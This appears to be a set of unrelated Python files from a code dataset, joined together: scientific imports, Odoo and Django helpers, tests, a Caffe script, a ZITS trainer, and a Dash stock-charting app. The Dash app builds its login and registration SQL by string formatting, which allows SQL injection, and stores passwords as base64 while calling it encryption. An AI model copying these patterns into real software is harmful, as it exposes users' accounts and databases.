113940 | from __future__ import absolute_import, division, print_function
from dxtbx_format_image_ext import * # noqa: F403
__all__ = ( # noqa: F405
"CBFFastImageListReader",
"CBFFastReader",
"CBFImageListReader",
"CBFReader",
"HDF5Reader",
"ImageBool",
"ImageBuffer",
"ImageDouble",
"ImageInt",
"ImageReader",
"ImageTileBool",
"ImageTileDouble",
"ImageTileInt",
"SMVImageListReader",
"SMVReader",
"TIFFImageListReader",
"TIFFReader",
)
| StarcoderdataPython |
193737 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import hr
from . import res_config_settings
from . import mail_alias
from . import mail_channel
from . import res_partner
from . import res_users
| StarcoderdataPython |
71523 | #Module Import
from config import *
try:
conn = psycopg2.connect(
host="postgres",
database="production",
user="postgres1",
password="<PASSWORD>")
cur = conn.cursor()
except Exception as e:
print('Not Connected: ' +str(e))
pass
#Callbacks
##Login callbacks
@app.callback(
Output("Login_modal", "is_open"),
[Input("Login", "n_clicks"), Input("close", "n_clicks")],
[State("Login_modal", "is_open")],
)
def toggle_login_modal(n1, n2, is_open):
if n1 or n2:
return not is_open
return is_open
@app.callback(
Output("loggedInStatusSuccess", "children"),
Output("loggedInStatus", "children"),
Output("favouritesDropdown","options"),
Output("login_email","value"),
Output("login_pw","value"),
[Input("loginButton", "n_clicks")],
[dash.dependencies.State("login_email", "value"),
dash.dependencies.State("login_pw", "value")],
)
def loginAccount(n_clicks,email,password):
try:
if (n_clicks > 0):
cur = conn.cursor()
#encrypt LOGIN password
encryptedLoginPassword = base64.b64encode(password.encode("utf-8")).decode("utf-8")
cur.execute("SELECT password from public.users WHERE username = '{}';".format(email))
result=cur.fetchone()
if str(result[0]) == str(encryptedLoginPassword):
favourites = []
session['username'] = email
cur.execute("SELECT ticker from public.userFavourites uF inner join users u on u.userId = uF.userId WHERE u.username = '{}';".format(session['username']))
result = cur.fetchall()
for ticker in result:
favourites.append(str(ticker[0]))
if favourites == None:
favourites = ['SPY']
return 'Login successful ' + str(session['username']) + ', you may exit the modal', 'Logged in as ' + str(email),[{'label': str(i), 'value': str(i)} for i in favourites],'',''
else:
cur.execute("rollback;")
return 'Authentication failed: Please check username/password','Login failed (please try again)', [{'label': 'SPY', 'value': 'SPY'}],'',''
except Exception as e:
cur.execute("rollback;")
return 'Error: ' + str(e),'Login failed (please try again)', [{'key': 'SPY', 'value': 'SPY'}],'',''
##Register Callbacks
@app.callback(
Output("Register_modal", "is_open"),
[Input("Register", "n_clicks"), Input("close_register", "n_clicks")],
[State("Register_modal", "is_open")],
)
def toggle_register_modal(n1, n2, is_open):
if n1 or n2:
return not is_open
return is_open
@app.callback(
Output("registeredStatus", "children"),
[Input("registerButton", "n_clicks")],
[dash.dependencies.State("registerEmail", "value"),
dash.dependencies.State("register_pw", "value")],
)
def registerAccount(n_clicks,email,password):
try:
if (n_clicks > 0):
#encrypt password
encryptedPassword = base64.b64encode(password.encode("utf-8")).decode("utf-8")
currentDateTime = datetime.now()
cur.execute("INSERT INTO public.users(username,password,dateCreated) VALUES('{}','{}','{}');".format(email,encryptedPassword,str(currentDateTime)))
cur.execute("SELECT username FROM public.users WHERE username = '{}' ;".format(email))
result = cur.fetchone()
return 'Registered: ' + str(result)
except Exception as e:
cur.execute("rollback;")
return 'Error: '+ str(e)
#Add to favourites
@app.callback(
Output("favouritesOutPut", "children"),
[Input("addToFavourites", "n_clicks")],
[dash.dependencies.State("stock_ticker", "value")])
def addChartToFavourites(n_clicks, value):
if (n_clicks):
try:
if session.get('username') is not None:
try:
cur.execute("SELECT userId FROM public.users WHERE username = '{}' ;".format(session['username']))
result = cur.fetchone()
cur.execute("INSERT INTO public.userFavourites(userId,ticker) VALUES({},'{}');".format(result[0],str(value)))
return 'Added {} to your favourites'.format(value)
except Exception as e:
return 'Error: '+ str(e)
elif session.get('username') is None:
return 'User not logged in'
except Exception as e:
return 'Error: '+ str(e)
#Favourites Callback
@app.callback(
Output("stock_ticker", "value"),
[Input("favouritesDropdown", "value")])
def generate_chartFromFavourites(value):
try:
if not value:
return ''
else:
return value
except Exception as e:
return 'Error: '+ str(e), 'Invalid Favourite Fundamental'
###Main chart generation
@app.callback(
Output("chartmain", "children"),
Output("fundamentals", "children"),
[Input("Generate", "n_clicks")],
[dash.dependencies.State('dateTimePicker', 'start_date'),
dash.dependencies.State('dateTimePicker', 'end_date'),
dash.dependencies.State('dropdownIntervals', 'value'),
dash.dependencies.State("stock_ticker", "value")])
def generate_chart(n_clicks, start_date, end_date, interval, value):
if n_clicks == None:
n_clicks = 0
elif (n_clicks > 0):
try:
if start_date == end_date:
end_date = datetime.strptime(end_date, '%Y-%m-%d')+timedelta(hours=24)
df = pdr.get_data_yahoo(value, start=start_date, end=end_date ,interval=interval)
fig = px.line(data_frame=df, x=df.index, y='Close')
else:
df = pdr.get_data_yahoo(value, start=start_date, end=end_date, interval=interval)
fig = px.line(data_frame=df, x=df.index, y='Close')
fig.update_layout(title ={'text' :'Stock Value of ' + value +':' + start_date + ' to ' + end_date, 'y': 0.9, 'x':0.5,'xanchor':'center','yanchor':'top'},
xaxis_title='Interval: ' + interval,
yaxis_title='Stock Doller Value',
title_font_family = "Roboto",
titlefont = {"size": 18})
##add export dataframe controls
dataExportcsv = df.to_csv(index=False,encoding='utf-8')
dataExportdfcsv = "data:text/csv;charset=utf-8," + urllib.parse.quote(dataExportcsv)
#Fundamental data ctonrls
df = pd.DataFrame.from_dict([yf.Ticker(value).info])
del df['longBusinessSummary']
data = df.to_dict('rows')
columns = [{"name": i, "id": i,} for i in (df.columns)]
chartMainGraph = dcc.Graph(figure=fig)
chartMainFundamentals = [dash_table.DataTable(id='fundamentalsTable',
data=data, columns=columns,
editable=False,
sort_action="native",
sort_mode="multi",
row_selectable="multi",
style_table={
'maxHeight': '50ex',
'overflowY': 'scroll',
'width': '100%',
'minWidth': '100%',
},
# style cell
style_cell={
'fontFamily': 'Open Sans',
'textAlign': 'center',
'height': '60px',
'padding': '2px 22px',
'whiteSpace': 'inherit',
'overflow': 'hidden',
'textOverflow': 'ellipsis',
},
style_cell_conditional=[
{
'if': {'column_id': 'State'},
'textAlign': 'left'
},
],
style_header={
'fontWeight': 'bold',
'backgroundColor': 'white',
},
style_data_conditional=[
{
# stripped rows
'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
},
{
# highlight one row
'if': {'row_index': 4},
"backgroundColor": "#3D9970",
'color': 'white'
}
]
)
]
return [html.A('Export Data', id="exportData",download="{}-data-for_{}_to_{}.csv".format(value,start_date,end_date), href=str(dataExportdfcsv),target="_blank"),
chartMainGraph], chartMainFundamentals
except Exception as e:
return 'Error: '+ str(e), 'No Fundamentals'
| StarcoderdataPython |
3317113 | from __future__ import print_function
from __future__ import division
import findcaffe
import caffe
import os, argparse
import os.path as osp
import numpy as np
import scipy.ndimage as nd
import pylab, png, pickle
from shutil import copyfile
from ipdb import set_trace
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib.colors as mpl_colors
import cv2
palette = [(0.0, 0.0, 0.0), (0.5, 0.0, 0.0), (0.0, 0.5, 0.0), (0.5, 0.5, 0.0),
(0.0, 0.0, 0.5), (0.5, 0.0, 0.5), (0.0, 0.5, 0.5), (0.5, 0.5, 0.5),
(0.25, 0.0, 0.0), (0.75, 0.0, 0.0), (0.25, 0.5, 0.0), (0.75, 0.5, 0.0),
(0.25, 0.0, 0.5), (0.75, 0.0, 0.5), (0.25, 0.5, 0.5), (0.75, 0.5, 0.5),
(0.0, 0.25, 0.0), (0.5, 0.25, 0.0), (0.0, 0.75, 0.0), (0.5, 0.75, 0.0),
(0.0, 0.25, 0.5), (0.75, 0.75, 0.75)]
my_cmap = mpl_colors.LinearSegmentedColormap.from_list('Custom cmap', palette, 22)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--net_file", default=None, type=str)
parser.add_argument("--weight_file", default=None, type=str)
parser.add_argument("--list_file", default=None, type=str)
parser.add_argument("--save_path", default=None, type=str)
args = parser.parse_args()
return args
def preprocess(image, label, size, mean_pixel):
image = nd.zoom(image.astype('float32'),
(size / float(image.shape[0]),
size / float(image.shape[1]), 1.0),
order=1)
label = nd.zoom(label,
(size / float(label.shape[0]),
size / float(label.shape[1])),
order=0)
# image = image[:, :, [2, 1, 0]]
image = image - mean_pixel
image = image.transpose([2, 0, 1])
image = np.expand_dims(image, 0)
label = np.reshape(label, newshape=(1, 1, size, size))
return image, label
class CaffeInfer(object):
def __init__(self, net_file, weight_file, gpu_id=0):
caffe.set_device(gpu_id)
caffe.set_mode_gpu()
self.net = caffe.Net(args.net_file, args.weight_file, caffe.TRAIN)
def eval(self, list_file, save_viz_path, save_score_name):
train_samples = [line.strip().split(" ") for line in open(list_file, "r").readlines()]
mean_pixel = np.array([104.0, 117.0, 123.0])
im_score = dict()
for k, (im_name, label_name) in enumerate(train_samples):
raw_im, raw_label = cv2.imread(im_name), cv2.imread(label_name, cv2.IMREAD_GRAYSCALE)
im, label = preprocess(raw_im, raw_label, 321, mean_pixel)
self.net.blobs['images'].data[...] = im
self.net.blobs['labels'].data[...] = label
self.net.forward()
score = np.squeeze(self.net.blobs['fc8_merge'].data[...])
score = nd.zoom(score, (1, raw_im.shape[0] / score.shape[1], raw_im.shape[1] / score.shape[2]), order=1)
pred = np.argmax(score, axis=0)
loss_seed = self.net.blobs['loss-Seed'].data[...][0]
loss_constrain = self.net.blobs['loss-Constrain'].data[...][0]
# draw result
# f = plt.figure(facecolor="white")
# ax = f.add_subplot(2, 2, 1)
# ax.imshow(raw_im[:, :, ::-1])
# ax.axis("off")
# raw_label[0, 0] = 21
# ax = f.add_subplot(2, 2, 2)
# ax.imshow(raw_label, cmap=my_cmap)
# ax.axis("off")
# pred[0, 0] = 21
# ax = f.add_subplot(2, 2, 3)
# ax.imshow(pred, cmap=my_cmap)
# ax.axis("off")
# gt_name = im_name.replace("JPEGImages", "SegmentationClassAug_color").replace("jpg", "png")
# gt = cv2.imread(gt_name)
# ax = f.add_subplot(2, 2, 4)
# ax.imshow(gt[:, :, ::-1])
# ax.axis("off")
pure_name = im_name.split("/")[-1].split(".")[0]
# title_str = "{:s}_{:.2f}_{:.2f}".format(pure_name, loss_seed, loss_constrain)
# plt.suptitle(title_str)
# plt.tight_layout()
# plt.subplots_adjust(wspace=0.01, hspace=0.01)
# plt.savefig(os.path.join(save_viz_path, pure_name + ".png"))
# plt.close()
im_score[pure_name] = [loss_seed, loss_constrain]
print("finish {} files".format(k))
pickle.dump(im_score, open(save_score_name, "wb"), pickle.HIGHEST_PROTOCOL)
def cmp(x, y):
res = 1 if x[1][0] < y[1][0] else 0
return res
if __name__ == "__main__":
args = parse_args()
root_path = "/data1/yaoqi/segmentation/weakly/wsss/dsrg/training/experiment/anti-noise/"
args.net_file = osp.join(root_path, "config/deeplabv2_weakly_forward.prototxt")
args.weight_file = osp.join(root_path, "model/model-sgan_iter_8000.caffemodel")
args.list_file = osp.join(root_path, "list/train_aug_pt_0328_ratio15.txt")
args.save_path = "training/visualize/eval_train"
save_score_name = "training/visualize/im_score_6396.pkl"
# infer im-score viz results if not exists
# if not osp.exists(args.save_path):
# os.makedirs(args.save_path)
# caffe_infer = CaffeInfer(args.net_file, args.weight_file)
# caffe_infer.eval(args.list_file, args.save_path, save_score_name)
# find top loss and least loss train samples
im_score = pickle.load(open(save_score_name, "rb"))
sort_im_score = sorted(im_score.items(), key=lambda d: d[1][0])
# top_loss_path = "visualize/top_100_loss"
# least_loss_path = "visualize/least_100_loss"
# if not osp.exists(top_loss_path):
# os.makedirs(top_loss_path)
# if not osp.exists(least_loss_path):
# os.makedirs(least_loss_path)
# for k in range(100):
# least_name = sort_im_score[k][0] + ".png"
# top_name = sort_im_score[-(k + 1)][0] + ".png"
# copyfile(osp.join(args.save_path, least_name), osp.join(least_loss_path, least_name))
# copyfile(osp.join(args.save_path, top_name), osp.join(top_loss_path, top_name))
write_im_path = "/home/yaoqi/Dataset/VOC2012/JPEGImages/"
write_gt_path = "/data1/yaoqi/home_segmentation/segmentation/weakly/DSRG/training/localization_cues/seed_0328_7440_5996/"
with open("train_aug_pt_1012_retrain_10282.txt", "w") as f:
for num, (k, v) in enumerate(sort_im_score):
if num < 10282:
f.write("{} {}\r\n".format(write_im_path + k + ".jpg", write_gt_path + k + ".png"))
# sort_path = "visualize/sort_eval_train"
# # set_trace()
# if not osp.exists(sort_path):
# os.makedirs(sort_path)
# for k, v in sort_im_score:
# save_im_name = "{:.3f}_{:s}".format(v[0], k)
# copyfile(osp.join(args.save_path, k + ".png"), osp.join(sort_path, save_im_name + ".png"))
| StarcoderdataPython |
1782620 | from ipyannotations import base
from unittest.mock import MagicMock
import ipywidgets
import pytest
ENTER_KEYUP = {"type": "keyup", "key": "Enter"}
ENTER_KEYDOWN = {"type": "keydown", "key": "Enter"}
BACKSPACE_KEYDOWN = {"type": "keyup", "key": "Backspace"}
class TestWidget(base.LabellingWidgetMixin, ipywidgets.VBox):
"""
Widget required as the mixin doesn't work if not also inheriting from VBox.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_error_on_passing_non_callable():
widget = TestWidget()
with pytest.raises(ValueError):
widget.on_submit(1)
def test_key_handling(mocker):
widget = TestWidget()
submission_function: MagicMock = mocker.MagicMock()
undo_function: MagicMock = mocker.MagicMock()
undo_spy: MagicMock = mocker.spy(widget, "undo")
widget.on_submit(submission_function)
widget.on_submit(undo_function)
widget.data = "test data"
widget._handle_keystroke(ENTER_KEYDOWN)
submission_function.assert_not_called()
widget._handle_keystroke(ENTER_KEYUP)
submission_function.assert_called_with("test data")
widget._handle_keystroke(BACKSPACE_KEYDOWN)
undo_spy.assert_called_once()
undo_function.assert_called_once()
| StarcoderdataPython |
1757110 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2019 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Unit tests for the OrographicSmoothingCoefficients utility.
"""
import unittest
import numpy as np
from iris.coords import DimCoord
from iris.cube import Cube
from iris.tests import IrisTest
from improver.utilities.ancillary_creation import OrographicSmoothingCoefficients
from improver.utilities.spatial import DifferenceBetweenAdjacentGridSquares
def set_up_cube():
"""Set up dummy cube for tests"""
data = np.array([[1.0, 5.0, 10.0], [3.0, 4.0, 7.0], [0.0, 2.0, 1.0]])
cube = Cube(data, "precipitation_amount", units="kg m^-2 s^-1")
cube.add_dim_coord(
DimCoord(np.linspace(0.0, 4.0, 3), "projection_y_coordinate", units="m"), 0
)
cube.add_dim_coord(
DimCoord(np.linspace(0.0, 4.0, 3), "projection_x_coordinate", units="m"), 1
)
return cube
class Test__init__(IrisTest):
"""Test the init method."""
def test_basic(self):
"""Test default attribute initialisation"""
result = OrographicSmoothingCoefficients()
self.assertEqual(result.min_smoothing_coefficient, 0.0)
self.assertEqual(result.max_smoothing_coefficient, 1.0)
self.assertEqual(result.coefficient, 1.0)
self.assertEqual(result.power, 1.0)
class Test__repr__(IrisTest):
"""Test the repr method."""
def test_basic(self):
"""Test that the __repr__ returns the expected string."""
result = str(OrographicSmoothingCoefficients())
msg = (
"<OrographicSmoothingCoefficients: min_smoothing_coefficient: "
"{}; max_smoothing_coefficient: {}; coefficient: {}; power: {}"
">".format(0.0, 1.0, 1, 1)
)
self.assertEqual(result, msg)
class Test_scale_smoothing_coefficients(IrisTest):
"""Class to test the scale_smoothing_coefficients function"""
def setUp(self):
"""Set up cube & plugin"""
self.plugin = OrographicSmoothingCoefficients()
cube = set_up_cube()
self.cubelist = [cube, cube]
def test_basic(self):
"""
Test the basic function of scale_smoothing_coefficients, using the
standard max and min smoothing_coefficients.
"""
result = self.plugin.scale_smoothing_coefficients(self.cubelist)
expected = np.array([[0.1, 0.5, 1.0], [0.3, 0.4, 0.7], [0.0, 0.2, 0.1]])
self.assertArrayAlmostEqual(result[0].data, expected)
self.assertArrayAlmostEqual(result[1].data, expected)
def test_maxmin(self):
"""
Tests the function of scale_smoothing_coefficients, using a max
and min value for smoothing_coefficient.
"""
result = self.plugin.scale_smoothing_coefficients(self.cubelist, 0.3, 0.5)
expected = np.array(
[[0.32, 0.40, 0.50], [0.36, 0.38, 0.44], [0.30, 0.34, 0.32]]
)
self.assertArrayAlmostEqual(result[0].data, expected)
self.assertArrayAlmostEqual(result[1].data, expected)
class Test_unnormalised_smoothing_coefficients(IrisTest):
"""Class to test the basic smoothing_coefficients function"""
def setUp(self):
"""Set up cube & plugin"""
self.plugin = OrographicSmoothingCoefficients(coefficient=0.5, power=2.0)
self.cube = set_up_cube()
def test_basic(self):
"""Test data are as expected"""
expected = np.array(
[[1.53125, 2.53125, 3.78125], [0.0, 0.5, 2.0], [1.53125, 0.03125, 0.78125]]
)
gradient_x, _ = DifferenceBetweenAdjacentGridSquares(gradient=True).process(
self.cube
)
smoothing_coefficient_x = self.plugin.unnormalised_smoothing_coefficients(
gradient_x
)
self.assertArrayAlmostEqual(smoothing_coefficient_x.data, expected)
class Test_gradient_to_smoothing_coefficient(IrisTest):
"""Class to test smoothing_coefficients data and metadata output"""
def setUp(self):
"""Set up cube & plugin"""
self.plugin = OrographicSmoothingCoefficients(
min_smoothing_coefficient=0.5, max_smoothing_coefficient=0.3
)
self.cube = set_up_cube()
self.gradient_x, self.gradient_y = DifferenceBetweenAdjacentGridSquares(
gradient=True
).process(self.cube)
def test_basic(self):
"""Test basic version of gradient to smoothing_coefficient"""
expected = np.array(
[
[0.40666667, 0.38, 0.35333333],
[0.5, 0.44666667, 0.39333333],
[0.40666667, 0.48666667, 0.43333333],
]
)
result = self.plugin.gradient_to_smoothing_coefficient(
self.gradient_x, self.gradient_y
)
self.assertEqual(result[0].name(), "smoothing_coefficient_x")
self.assertArrayAlmostEqual(result[0].data, expected)
self.assertNotIn(
"forecast_period", [coord.name() for coord in result[0].coords()]
)
self.assertNotIn(
"forecast_time", [coord.name() for coord in result[0].coords()]
)
class Test_process(IrisTest):
"""Class to test end-to-end smoothing_coefficients creation"""
def setUp(self):
"""Set up cube & plugin"""
self.plugin = OrographicSmoothingCoefficients(
min_smoothing_coefficient=1.0, max_smoothing_coefficient=0.0
)
self.cube = set_up_cube()
def test_basic(self):
"""Tests that the final processing step gets the right values."""
result = self.plugin.process(self.cube)
expected_x = np.array(
[
[0.53333333, 0.4, 0.26666667],
[1.0, 0.73333333, 0.46666667],
[0.53333333, 0.93333333, 0.66666667],
]
)
expected_y = np.array(
[
[0.4, 0.93333333, 0.8],
[0.93333333, 0.8, 0.4],
[0.26666667, 0.66666667, 0.0],
]
)
self.assertArrayAlmostEqual(result[0].data, expected_x)
self.assertArrayAlmostEqual(result[1].data, expected_y)
def test_list_error(self):
"""Test that a list of orography input cubes raises a value error"""
with self.assertRaises(ValueError):
self.plugin.process([self.cube, self.cube])
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3261501 | from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
class Pagination:
def __init__(self, objects, amount):
self.paginator = Paginator(objects, amount)
def items_for_page(self, page):
try:
items = self.paginator.page(page)
except PageNotAnInteger:
items = self.paginator.page(1)
except EmptyPage:
items = self.paginator.page(self.paginator.num_pages)
return items
| StarcoderdataPython |
1621407 | <reponame>DQiaole/ZITS
import math
import os
import time
import cv2
import numpy as np
import torch
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to run this example.")
class EdgeAccuracy(torch.nn.Module):
"""
Measures the accuracy of the edge map
"""
def __init__(self, threshold=0.5):
super(EdgeAccuracy, self).__init__()
self.threshold = threshold
def __call__(self, inputs, outputs):
labels = (inputs > self.threshold)
outputs = (outputs > self.threshold)
relevant = torch.sum(labels.float())
selected = torch.sum(outputs.float())
if relevant == 0 and selected == 0:
return torch.tensor(1), torch.tensor(1), torch.tensor(1)
true_positive = ((outputs == labels) * labels).float()
recall = torch.sum(true_positive) / (relevant + 1e-8)
precision = torch.sum(true_positive) / (selected + 1e-8)
f1_score = (2 * precision * recall) / (precision + recall + 1e-8)
return precision * 100, recall * 100, f1_score * 100
class TrainerConfig:
# optimization parameters
max_epochs = 10
batch_size = 64
learning_rate = 3e-4
betas = (0.9, 0.95)
grad_norm_clip = 1.0
weight_decay = 0.1
lr_decay = False
warmup_iterations = 375e6
final_iterations = 260e9
iterations_per_epoch = 1e5
# checkpoint settings
ckpt_path = None
num_workers = 0 # for DataLoader
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class TrainerForContinuousEdgeLine:
def __init__(self, model, train_dataset, test_dataset, config, gpu, global_rank, iterations_per_epoch, logger=None):
self.model = model
self.train_dataset = train_dataset
self.test_dataset = test_dataset
self.iterations_per_epoch = iterations_per_epoch
self.config = config
self.device = gpu
self.model = model
self.metric = EdgeAccuracy(threshold=0.5)
self.global_rank = global_rank
self.train_sampler = DistributedSampler(train_dataset, num_replicas=config.world_size,
rank=global_rank, shuffle=True)
self.logger = logger
def save_checkpoint(self, epoch, optim, iterations, validation, edgeF1, lineF1, save_name):
if self.global_rank == 0: # Only save in global rank 0
raw_model = self.model.module if hasattr(self.model, "module") else self.model
save_url = os.path.join(self.config.ckpt_path, save_name + '.pth')
self.logger.info("saving %s", save_url)
torch.save({'model': raw_model.state_dict(),
'epoch': epoch,
'optimizer': optim.state_dict(),
'iterations': iterations,
'best_validation': validation,
'edgeF1': edgeF1,
'lineF1': lineF1}, save_url)
def load_checkpoint(self, resume_path):
if os.path.exists(resume_path):
data = torch.load(resume_path)
self.model.load_state_dict(data['model'])
self.model = self.model.to(self.device)
if self.global_rank == 0:
self.logger.info('Finished reloading the Epoch %d model' % (data['epoch']))
return data
else:
self.model = self.model.to(self.device)
if self.global_rank == 0:
self.logger.info('Warnning: There is no trained model found. An initialized model will be used.')
return None
def train(self, loaded_ckpt):
model, config = self.model, self.config
raw_model = model.module if hasattr(self.model, "module") else model
optimizer = raw_model.configure_optimizers(config)
if self.config.AMP: ## use AMP
model, optimizer = amp.initialize(model, optimizer, num_losses=1, opt_level='O1')
previous_epoch = -1
bestAverageF1 = 0
if loaded_ckpt is not None:
optimizer.load_state_dict(loaded_ckpt['optimizer'])
self.iterations = loaded_ckpt['iterations']
bestAverageF1 = loaded_ckpt['best_validation']
previous_epoch = loaded_ckpt['epoch']
if self.global_rank == 0:
self.logger.info('Finished reloading the Epoch %d optimizer' % (loaded_ckpt['epoch']))
else:
if self.global_rank == 0:
self.logger.info(
'Warnning: There is no previous optimizer found. An initialized optimizer will be used.')
train_loader = DataLoader(self.train_dataset, pin_memory=True,
batch_size=config.batch_size // config.world_size, # BS of each GPU
num_workers=config.num_workers, sampler=self.train_sampler)
test_loader = DataLoader(self.test_dataset, shuffle=False, pin_memory=True,
batch_size=config.batch_size // config.world_size,
num_workers=config.num_workers)
if loaded_ckpt is None:
self.iterations = 0 # counter used for learning rate decay
for epoch in range(config.max_epochs):
if previous_epoch != -1 and epoch <= previous_epoch:
continue
if epoch == previous_epoch + 1 and self.global_rank == 0:
self.logger.info("Resume from Epoch %d" % (epoch))
self.train_sampler.set_epoch(epoch) ## Shuffle each epoch
epoch_start = time.time()
model.train()
loader = train_loader
losses = []
not_show_tqdm = True
for it, items in enumerate(tqdm(loader, disable=not_show_tqdm)):
# place data on the correct device
for k in items:
if type(items[k]) is torch.Tensor:
items[k] = items[k].to(self.device)
edge, line, loss = model(items['img'], items['edge'], items['line'], items['edge'], items['line'],
items['mask'])
loss = loss.mean() # collapse all losses if they are scattered on multiple gpus
losses.append(loss.item())
# backprop and update the parameters
self.iterations += 1 # number of iterations processed this step (i.e. label is not -100)
model.zero_grad()
if self.config.AMP:
with amp.scale_loss(loss, optimizer, loss_id=0) as loss_scaled:
loss_scaled.backward()
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), config.grad_norm_clip)
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), config.grad_norm_clip)
optimizer.step()
# decay the learning rate based on our progress
if config.lr_decay:
if self.iterations < config.warmup_iterations:
# linear warmup
lr_mult = float(self.iterations) / float(max(1, config.warmup_iterations))
else:
# cosine learning rate decay
progress = float(self.iterations - config.warmup_iterations) / float(
max(1, config.final_iterations - config.warmup_iterations))
lr_mult = max(0.1, 0.5 * (1.0 + math.cos(math.pi * progress)))
lr = config.learning_rate * lr_mult
for param_group in optimizer.param_groups:
param_group['lr'] = lr
else:
lr = config.learning_rate
if it % self.config.print_freq == 0 and self.global_rank == 0:
self.logger.info(
f"epoch {epoch + 1} iter {it}/{self.iterations_per_epoch}: train loss {loss.item():.5f}. lr {lr:e}")
if self.iterations % 2000 == 1 and self.global_rank == 0:
edge_output = edge[:4, :, :, :].squeeze(1).cpu()
edge_output = torch.cat(tuple(edge_output), dim=0)
line_output = line[:4, :, :, :].squeeze(1).cpu()
line_output = torch.cat(tuple(line_output), dim=0)
masked_edges = (items['edge'][:4, ...] * (1 - items['mask'][:4, ...])).squeeze(1).cpu()
original_edge = items['edge'][:4, ...].squeeze(1).cpu()
masked_lines = (items['line'][:4, ...] * (1 - items['mask'][:4, ...])).squeeze(1).cpu()
original_line = items['line'][:4, ...].squeeze(1).cpu()
masked_edges = torch.cat(tuple(masked_edges), dim=0)
original_edge = torch.cat(tuple(original_edge), dim=0)
masked_lines = torch.cat(tuple(masked_lines), dim=0)
original_line = torch.cat(tuple(original_line), dim=0)
output = torch.cat([original_edge.float(), original_line.float(), masked_edges.float(),
masked_lines.float(), edge_output.float(), line_output.float()],
dim=-1)[:, :, None].repeat(1, 1, 3)
output *= 255
output = output.detach().numpy().astype(np.uint8)
current_img = items['img'][:4, ...] * 0.5 + 0.5
current_img = current_img.permute(0, 2, 3, 1) * 255
original_img = np.concatenate(current_img.cpu().numpy().astype(np.uint8), axis=0)
mask = items['mask'][:4, ...].permute(0, 2, 3, 1)
current_img = (current_img * (1 - mask)).cpu().numpy().astype(np.uint8)
current_img = np.concatenate(current_img, axis=0)
output = np.concatenate([original_img, current_img, output], axis=1)
save_path = self.config.ckpt_path + '/samples'
os.makedirs(save_path, exist_ok=True)
cv2.imwrite(save_path + '/' + str(self.iterations) + '.jpg', output[:, :, ::-1])
# eval
model.eval()
edge_P, edge_R, edge_F1, line_P, line_R, line_F1 = self.val(model, test_loader)
model.train()
average_F1 = (edge_F1 + line_F1) / 2
self.logger.info("Epoch: %d, edge_P: %f, edge_R: %f, edge_F1: %f, line_P: %f, line_R: %f, "
"line_F1: %f, ave_F1: %f time for 2k iter: %d seconds" %
(epoch, edge_P, edge_R, edge_F1, line_P, line_R, line_F1, average_F1,
time.time() - epoch_start))
# supports early stopping based on the test loss, or just save always if no test set is provided
good_model = self.test_dataset is None or average_F1 >= bestAverageF1
if self.config.ckpt_path is not None and good_model and self.global_rank == 0: ## Validation on the global_rank==0 process
bestAverageF1 = average_F1
EdgeF1 = edge_F1
LineF1 = line_F1
self.logger.info("current best epoch is %d" % (epoch))
self.save_checkpoint(epoch, optimizer, self.iterations, bestAverageF1, EdgeF1, LineF1,
save_name='best')
self.save_checkpoint(epoch, optimizer, self.iterations, average_F1, edge_F1, line_F1,
save_name='latest')
def val(self, model, dataloader):
edge_precisions, edge_recalls, edge_f1s = [], [], []
line_precisions, line_recalls, line_f1s = [], [], []
for it, items in enumerate(tqdm(dataloader, disable=False)):
# place data on the correct device
for k in items:
if type(items[k]) is torch.Tensor:
items[k] = items[k].to(self.device)
with torch.no_grad():
edge, line, _ = model(items['img'], items['edge'], items['line'], masks=items['mask'])
edge_preds = edge
line_preds = line
precision, recall, f1 = self.metric(items['edge'] * items['mask'], edge_preds * items['mask'])
edge_precisions.append(precision.item())
edge_recalls.append(recall.item())
edge_f1s.append(f1.item())
precision, recall, f1 = self.metric(items['line'] * items['mask'],
line_preds * items['mask'])
line_precisions.append(precision.item())
line_recalls.append(recall.item())
line_f1s.append(f1.item())
return float(np.mean(edge_precisions)), float(np.mean(edge_recalls)), float(np.mean(edge_f1s)), \
float(np.mean(line_precisions)), float(np.mean(line_recalls)), float(np.mean(line_f1s))
